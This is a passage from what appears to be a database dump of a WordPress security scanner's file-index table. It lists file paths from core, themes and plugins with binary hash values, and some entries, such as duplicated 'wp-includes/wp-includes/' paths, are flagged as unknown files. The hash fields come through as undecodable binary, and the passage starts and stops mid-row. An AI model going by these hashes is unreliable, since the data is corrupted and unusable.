$��c','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��|��\'\rȤ�@�\n','B��x.e��DP�0�����$\Z�D3��','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� ��̦�7�$��]9','wp-content/themes/anima/includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�t�ф�[!��dAw','�i��`D+�1���W`��?r<� ^�A��#����','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z%�[�l�]ʕ����','���I�^�K��_�i��Gz��:5��n|�ߡL','',0,'?'),('�\"�5����M���<�.','wp-content/themes/promote/inc/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.d>G�\0�kN/G','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('�.��{���Gtj��=�{','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',0,'xR� �Y�X���ݤ���','xR� �Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�Ot��\rVe��z�.','wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js',0,'�[/�Zo[�Ǵ��/.','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�e\"V�T�1��z��o��','wp-content/themes/gambit/css/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;(H��-Jht�x�','��;�m��}������e(~�y0m�=�},','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��{�x�y6roc�','ɬ�v��O�܋)%���\0���|М���O�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��FC ���z[�0','�s�՛ �e��\"i�0\'\0^ٜ7k�I�]���','',0,'?'),('ۏ(DF��8w#��','wp-content/themes/promote/inc/kirki/includes/output/field/class-kirki-output-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����D�F^�0\r�','�\Z�d�6��f\0��Iz���(�|���','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪�� .�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('��r�����=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�Ȟ3�d%�49�2ݪ','wp-content/themes/auberge/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','몽,�,e)a�-��W','G�M�P�4\0W�e��]v{�u\\��ʺ','',0,'?'),('��x���\n�?Sa��i','wp-content/themes/storeone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��w�@5��*�','�9��/i��Z�N���-��æ&��V�','',0,'?'),('�ڨ�t�c �˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y.��|� �zo~��','�m`C/\r���~�����/#b\ZM͆��]�؍i','',0,'?'),('��0�/|�h�����s�','wp-content/themes/sg-window/inc/widget-items-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K��{�>��g�J','�9N#�\\ڨ6���N�s�Ę���H��sM�~','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g�� ��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('��6�+�?��s��<','wp-content/themes/spidermag/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�2f/�cV�����','\"��̖���)v\r�{�\\�,JF͈))�Z','',0,'?'),('�Ƒ�J�T|~n��,�','wp-content/themes/promote/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ql���d#��:B��qV�','i>�-���JU:k�?����eB�\r�x�g�','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�!�[�r��E:�T��U','wp-content/themes/maxbusiness/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('�1���<LOG��S�\r','wp-includes/wp-includes/class-wp-block-type-registry.php',0,'rR�M8��u<�V�l��','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�9����l3N\Z','wp-content/themes/promote/images/list_type.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';H�(En��5��=G�','�\"I�Lh|cc5a��h#r���\Zɫ���','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('�Qx/3���5�&�؝�','wp-content/themes/pine/inc/notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��Hv>;MDr','��OzSi�+�y��R����(F҃��[L�N4�','',0,'?'),('�TTf��;�*vj','wp-content/themes/Yegor/content.php',0,'�D2\'섗D\"pKl�.G','�D2\'섗D\"pKl�.G','J�9,ᝋp�$�B�D���h�p���z�> �','',0,'?'),('�Y�P���?=E�dY�','wp-content/themes/event/assets/sticky/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�37�\r=�����n','L��\n��Ne�d\rO��)���q�M�\r�wX�','',0,'?'),('�](�}��a#���','wp-content/themes/skt-pathway/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r.�7�/�3\'�O��','䔍�&��^��JdLR��bu]������m��8','',0,'?'),('�]��`���J�$tAM�','wp-content/themes/newsmag/assets/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k ��<-��U©,��','��}+-!xћUi��(\'�����i)�+�(� k�','',0,'?'),('�j~ʰ��v�vj�K1�','wp-content/themes/newsmag/inc/widgets/posts_grid/class-widget-newsmag-posts_grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H0��+�9�\0��o�','.��*�wŘ�e�𡞝��+��}��K*�G�','',0,'?'),('�j�+v�fU��L)','wp-content/themes/capacious/template-parts/content-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �D�#�j2��/�','!�^�)*�^�g)�}�\0a���-@EL^*6�8','',0,'?'),('܁m�½b��!����','wp-content/themes/storeone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�\'��;�{�w��oN','�~��c���>�����{������sr�Z','',0,'?'),('܅zϞ]�����L�3��','wp-content/themes/wp-barrister/content-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Ƹ7�\'뙛0���','���*�Ń�AIs�����]��7�\n���','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('ܢ�q?���eߥhЌ','wp-content/themes/anima/resources/images/demo/8.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���TH�B������','�8)�=\'*��|]2��Ȉ�T�/���o���','',0,'?'),('ܥ�[kmy}�QEާ','wp-content/themes/sg-window/img/icons/small/youtube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ .�s��E��B>�','�K-{��H ����[u�Ӛ���w�Q�3_�','',0,'?'),('ܷ\n9*om��L6�>~�','wp-includes/wp-includes/ID3/module.audio.flac.php',0,'��-�ל�/f��T�@','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('ܷ徃� ���@+x','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-recent-posts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�棌�zIm��v','� \Z>\"��p�WCj�U8\"�2��da������^','',0,'?'),('���.�U� ��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��}o�c����j\0��','wp-includes/wp-includes/pluggable.php',0,'�pq�����EyJ�$��','�pq�����EyJ�$��','�Y�Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('�ޒЌ=��ߕ0$�:(','wp-includes/wp-includes/images/arrow-pointer-blue.png',0,'w��b�·*L���[��','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('�����=~%�0��t','wp-content/themes/spidermag/spidermag/core/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','20��\"�\Z T��%h�-','9��к���^\\%o��g�_{5�&ˡ�\n�ȅ','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{
��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�����G1��','[�d�뿪�a��o�Ϸ�8|[��U��u�(','',0,'?'),('�(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('���J�8��)�Qz�_�','wp-includes/wp-includes/js/wp-list-revisions.min.js',0,'���}�\Z�ۦ_��8K','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('�)�ވ.sچ�4����','wp-content/themes/sg-window/img/icons/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7U��0O֑7�^��|','8�I��T�h.;��\r1�����N���Yٟ5','',0,'?'),('�11f@m�r(���E','wp-content/themes/newsmag/assets/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�X���`\r\0M%t�','f���+*�>�-�,���(�Ă�\\���z','',0,'?'),('�7�B�J���~}\0','wp-content/themes/advance/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��aC���h�lC\0r�','�ꠤ�D>i����<OTb�ӭ��#�C)i�S�','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+� �n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\" �����;��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�)=�\'d�G�','d6��H�W�F�8!�y�NA���2��\'`@�','',0,'?'),('�f��=�$�c��<��','wp-content/themes/advance/inc/customizer/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�K{8���x���/�:�','C~�H�(k���؆E��a�JU���-�J)�','',0,'?'),('�}���ʖn�̵~','wp-content/themes/advance/js/upsell.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ȴ\"�-�RL�?E','���Q�¬�g�!h�9Aw��pQa����Y','',0,'?'),('��XtK�;@\\�r�','wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php',0,'� ��9-��K���9,�','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('�����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('�˷�vd����K�Q,��','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��Z�A�u��Z�҇','�v��V���p�#r��]z�b�u`B)�','',0,'?'),('���1��JRw��ċ�','wp-content/themes/Kent/FT/plugin/updater.php',0,'uc3\\����[\'�N�9�','uc3\\����[\'�N�9�','Q�s�=\\Eؐ�@���\0EF�r�^Do���\\','',0,'?'),('��%&�flH]:kS(','wp-content/themes/spidermag/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�&\\���5>8/��\0','4<��T��&f�����n�8!�j_�\Z��\r�Y','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�M�dY���� �e �','wp-content/themes/hueman/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��5��ْh�>�A','a�\"�1����ץD�R�>��Cvݝ���ǚ','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�γHw�n�)f =q','wp-includes/wp-includes/css/admin-bar.css',0,'�p�t_K��ᕮ��','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{� @�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�\'ba�ᘭ���','wp-content/themes/maxbusiness/js/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|����̎-�tۙٿ','\"��Z?��G�����t~*�^O�c����','',0,'?'),('� Ϧ0#TF�sۂ���t','wp-includes/wp-includes/class-wp-block-patterns-registry.php',0,'�O�>�O^��\"����','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('�$#�B�����]{�','wp-content/themes/promote/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PKށt���uLW�|�','���e@11���;�6uV�3\0I�Ԃi\n/�','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�F����^l����5d�4','wp-content/themes/hueman/functions/admin/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`���iilp�%� ','�����l4�ŧ1�imW�ZD)�8[��ƴ�','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('�d�!ܭ$��5\'�d�','wp-includes/wp-includes/js/dist/viewport.js',0,'��ߙ��,���B�','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ =�','',0,'?'),('�d-EV��_Wٝ-Y�','wp-content/themes/skt-pathway/css/computer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy|�\"�{T��@\r�s�','�Y\n�.��[\\ }@ث���5r\08��:���\'','',0,'?'),('�s[I-�O��_M�]�','wp-includes/wp-includes/images/smilies/icon_wink.gif',0,'e?2���i����','e?2���i����','�(���V��{�V�Bk����o(`Z��V 6','',0,'?'),('ރ��n�;�u!���:','wp-content/themes/wp-barrister/library/images/icon-fb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���D*���ÿ�?','�d��T}�|��p�u�w�d~�.�_W�TQ','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޜ\"��ߚ�BJ��\"qN','wp-content/themes/promote/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���\r$�6�4�','��Ƭ|��N,��$��h�f��Ey��o`�~','',0,'?'),('ޝ~�QB��>%?�q�','wp-includes/wp-includes/css/dist/block-library/theme.min.css',0,'q��/���c�','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('ު� 5ʲ~Pƹì�','wp-includes/wp-includes/SimplePie/Cache/Memcache.php',0,'���u���5uyS��','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('���h�3��\"L�L��.','wp-content/themes/advance/images/rps_arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�4ܻ;��#\0�Ѥ�','bۿb�h������d~��x<T�|�q�T{���','',0,'?'),('�Ǜ����\nb6��R','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-half-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�W������r��','GD-Ḁ��1��##/�W��f2@��x�^ �','',0,'?'),('�ˋ8����C�z0�','wp-content/themes/spidermag/assets/images/grabbing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۥ�]���{','Y2���c]ԅb��b����r׆jcz�xX','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a� Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('������B����','wp-content/themes/travel-stories/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�o���ӱ��~��','x@��\Zb͌� \nEZ$�?�N��/���\r����','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C�','',0,'?'),('�-�(l�hD>�Lνd','wp-includes/wp-includes/class-wp-matchesmapregex.php',0,'��Q���d̚w$<龦q','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('� �E~mQ��P4ދ','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-banner.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���/�:MYp���w#�','�n�\\6�ugy@7�L�������%����','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�2%��{I�\Z����','wp-content/themes/hueman/parts/single-author-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9.�g���]�DQ� &','�tU\0g E㐻{�X���Ɔ��)���','',0,'?'),('�2�e���U�߶r�%','wp-content/themes/kidzoo-lite/sass/base/_wordpress.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͟>�i��a0��+�^6','���͜D���4��❨�\n��/MG2l��Y1w�','',0,'?'),('�6��\'���3��ݔ','wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php',0,'7_^\\fS�ɉ�]6n#\Z','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\07Α�L��b�HgO�','5���m���%!��au�l�qRk{qn�ia�0','',0,'?'),('�r�±�2�\"}� �,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('�y�-�\r�Ŧ�}p72\n','wp-content/themes/pine/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����tq�l_{�','������\0#9�[�s�J�-k\Z-(J4R�;','',0,'?'),('߆<߯?+��sQ[��','wp-content/themes/hueman/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%J�~wm�\"�j瑶','�����U��9>+ Ћ���NW<K�','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߑ�-��\r�Ϸ΄�.�','wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js',0,'U���E��|�h(Zf�','U���E��|�h(Zf�','ӣ }�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߕQ��@��,���3I','wp-includes/wp-includes/images/smilies/icon_lol.gif',0,'n����:ѷ&����(�','n����:ѷ&����(�','�l�1�Hq�.�2�x��$�Y�\Z8�','',0,'?'),('ߗ�H4�[�w�Q@','wp-includes/wp-includes/class-IXR.php',0,'��0���C`q�x�','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('ߟ�����}{H����','wp-content/themes/newsmag/assets/sass/variables-site/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��o�?�YCƑ�}','�6�ǠH�A�\Z��]�*\\�@g���-B?�','',0,'?'),('߮�=?�p������v','wp-content/themes/sg-window/single-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӗ93Cy��+�O','�$��1��K��4� v�ls�:��9�%L?��','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d� 